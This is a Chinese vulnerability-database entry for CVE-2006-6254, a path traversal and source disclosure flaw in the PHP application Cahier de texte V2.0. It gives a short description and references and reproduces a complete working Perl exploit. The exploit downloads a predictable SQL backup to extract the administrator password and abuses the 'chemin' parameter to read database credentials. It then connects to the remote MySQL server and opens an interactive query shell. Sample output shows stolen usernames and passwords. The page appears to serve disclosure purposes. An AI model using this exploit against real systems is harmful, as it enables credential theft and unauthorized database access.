Cahier De Texte 'Telecharger.PHP'目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111658 漏洞类型 路径遍历
发布时间 2006-11-24 更新时间 2006-12-06
CVE编号 CVE-2006-6254 CNNVD-ID CNNVD-200612-057
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/2844
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-057
|漏洞详情
Cahierdetexte的administration/telecharger.php目录遍历漏洞。远程攻击者通过chemin参数获取文件未解析的内容(源码),如使用目录遍历序列从conn_cahier_de_texte.php获取MySQL用户名和密码。注意:还不清楚此问题是否扩展上述web文档root以及是否目录遍历是主要漏洞。
|漏洞EXP
#!/usr/bin/perl
#
#
# INFORMATIONS
# ============
# Affected.scr..: Cahier de texte V2.0
# Poc.ID........: 15061124
# Type..........: Predictable backup filename, Source disclosure
# Risk.level....: High
# Conditions....: register_globals = on
# Src.download..: www.etab.ac-caen.fr/bsauveur/cahier_de_texte/
# Poc.link......: acid-root.new.fr/poc/15061124.txt
# Credits.......: DarkFig
# Note..........: Coded for fun
#
#
# SCREENSHOT
# ==========
# header> Cahier de texte V2.0 SQL Code Execution Exploit
# header> -----------------------------------------------
# status> Searching the backup file
# sploit> Administrateur::epolas
# status> Downloading database informations
# sploit> Host::sql.mysite.com
# sploit> Database::cahier_de_texte
# sploit> Username::root
# sploit> Password::toor
# status> Contacting the mysql server
# _mysql> select * from cdt_prof
# +-------+--------------+---------+
# |ID_prof|nom_prof      |passe    |
# +-------+--------------+---------+
# |      1|Administrateur|epolas   |
# |      2|DarkFig       |crazypass|
# +-------+--------------+---------+
# 2 rows processed
#
# _mysql> exit
#
use MySQL;
use Getopt::Long;
use LWP::UserAgent;
use HTTP::Response;
use HTTP::Request::Common;

print STDOUT "\nheader> Cahier de texte V2.0 SQL Code Execution Exploit";
print STDOUT "\nheader> ", "-" x 47, "\n";

$opt = GetOptions(
         'host=s'   =>  \$host,
         'path=s'   =>  \$path,
         'proxh=s'  =>  \$proxh,
         'proxu=s'  =>  \$proxu,
         'proxp=s'  =>  \$proxp);

if(!$host) {
    print STDOUT "header> Usage: ./xXx.pl --host=[www] --path=[/] [Opts]\n";
    print STDOUT "header> [Opts] --proxh=[ip] --proxu=[user] --proxp=[pwd]\n";
    exit(1);
}

$host = $host !~ /^http:\/\// ? "http://$host" : $host;
$path = defined($path) ? $path : "/";

$ua = LWP::UserAgent->new();
$ua->agent('0xzilla');
$ua->timeout(30);
$ua->proxy(['http'] => $proxh) if $proxh;
$re->proxy_authorization_basic($proxu, $proxp) if $proxp;

# First vulnerability
# ===================
# The backup's filename is allways the same
# If the file is protected by a .htaccess file,
# use the source disclosure vulnerability to get it.
# There is also all members passwords but here we
# just take the administrator password.

print STDOUT "status> Searching the backup file\n";
$re  = GET $host.$path.'administration/dump.sql';
$res = $ua->request($re);

if($res->as_string !~ /HTTP\/1.(x|1) 404 Not Found/) {
if($res->content =~ /INSERT INTO cdt_prof VALUES\(1, 'Administrateur', '(.*?)'\);/) {
print STDOUT "sploit> Administrateur::$1\n";}} else {
print STDOUT "sploit> None backup found\n";}

# Second vulnerability
# ====================
# Source disclosure in administration/telecharger.php

print STDOUT "status> Downloading database informations\n";
$ch  = '../Connections/conn_cahier_de_texte.php&Fichier_a_telecharger=';
$re  = GET $host.$path."administration/telecharger.php?chemin=$ch";
$res = ($ua->request($re))->content;

if($res =~  /\$hostname_conn_cahier_de_texte([\s]*)=([\s]*)"(.*?)";([\s]*)(||
            )\$database_conn_cahier_de_texte([\s]*)=([\s]*)"(.*?)";([\s]*)(||
            )\$username_conn_cahier_de_texte([\s]*)=([\s]*)"(.*?)";([\s]*)(||
            )\$password_conn_cahier_de_texte([\s]*)=([\s]*)"(.*?)";([\s]*)/) {

$mhost=$3; $database=$8; $username=$13; $password=$18;
print STDOUT "sploit> Host::$mhost\nsploit> Database::$database\n";
print STDOUT "sploit> Username::$username\nsploit> Password::$password\n";} else {
print STDOUT "sploit> Exploit failed\n";
exit(1);}

if($mhost =~ /^(localhost|127\.0\.0\.1)$/ or !$mhost) {
print STDOUT "sploit> MySQL server is localhost\n";
exit(1);}

# Third step
# ==========
# Trying a connection with the MySQL server

print STDOUT "status> Contacting the mysql server\n";
$dbh = Mysql->connect($mhost, $database, $username, $password);
$dbh->selectdb($database);

while() {
   print STDOUT "_mysql> ";
   chomp($query = <STDIN>);

   $query =~ /^(exit||quit)$/   ? exit(0)               : 0x2727;
   $res   = $dbh->query($query) ? $dbh->query($query)   : $dbh->errmsg();
   $res  != $dbh->errmsg()      ? print $res->as_string : 0x2727;
}

# milw0rm.com [2006-11-24]
|参考资料

来源:BID
名称:21283
链接:http://www.securityfocus.com/bid/21283
来源:BUGTRAQ
名称:20061124CahierdetexteV2.0SQLCodeExecutionExploit
链接:http://www.securityfocus.com/archive/1/archive/1/452600/100/0/threaded
来源:VUPEN
名称:ADV-2006-4701
链接:http://www.frsirt.com/english/advisories/2006/4701
来源:SECUNIA
名称:23122
链接:http://secunia.com/advisories/23122
来源:MISC
链接:http://acid-root.new.fr/poc/15061124.txt
来源:SREASON
名称:1961
链接:http://securityreason.com/securityalert/1961